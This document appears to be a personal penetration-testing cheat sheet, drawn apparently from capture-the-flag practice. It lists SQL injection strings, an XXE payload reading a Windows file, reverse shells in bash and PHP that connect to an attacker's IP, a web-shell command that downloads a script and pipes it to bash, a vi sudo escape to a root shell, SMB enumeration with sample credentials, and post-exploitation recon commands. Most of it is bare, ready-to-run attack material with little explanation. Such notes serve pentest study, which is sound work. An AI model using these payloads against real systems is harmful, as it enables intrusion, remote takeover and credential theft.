Penetration Test
Flow
VA -> PT
- Planning and Reconnaissance
- Scanning
- Gaining System Access
- Persistent Access
- Analysis and Reporting
Injection
SQL injection
') or ( '1'='1
') or ( '1'=0
admin'||'1==1
1 or 1 = 1 UNION SELECT user
XSLT Server Side Injection
example
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>address</address>
</order>
SSTI (Server Side Template injection)
Tools:
- Java: VikasVarshney/ssti-payload: SSTI Payload Generator
- [Day13] - SSTI - iT 邦幫忙
- SSTI (Server Side Template Injection) - HackTricks
reverse shell
bash
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
php
<?php system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [ip] [port] > /tmp/f; rm /tmp/f'); ?>
Web shell
Dysco.php?cmd=curl ${your_IP}:8000/shell.sh|bash
Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
vi
# is `sudo -l`
# User postgres may run the following commands on vaccine:
# (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
# step 1
vi
:set shell=/bin/sh
:shell
# step 2
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
SSH tunnel
# windows
# linux
lsof -i -n | egrep '\<ssh\>'
139,445 - Pentesting SMB
# show smb file
smbmap -R -u "hazard" -p "stealth1agent" -H $ip
# get user list
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py
python lookupsid.py hazard:[email protected]
Program Language
What can you do when you hack into the server
See below
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export PATH="/tmp:$PATH"; echo $PATH;
whoami
sudo -l
ps aux
id
groups
cat /etc/passwd | grep -v "nologin\|false\|sync"
timeout 5s ...
ss -tul
sudo PATH="/tmp:$PATH" /usr/bin/whoami
Last modified March 17, 2023: update (cdf1f69)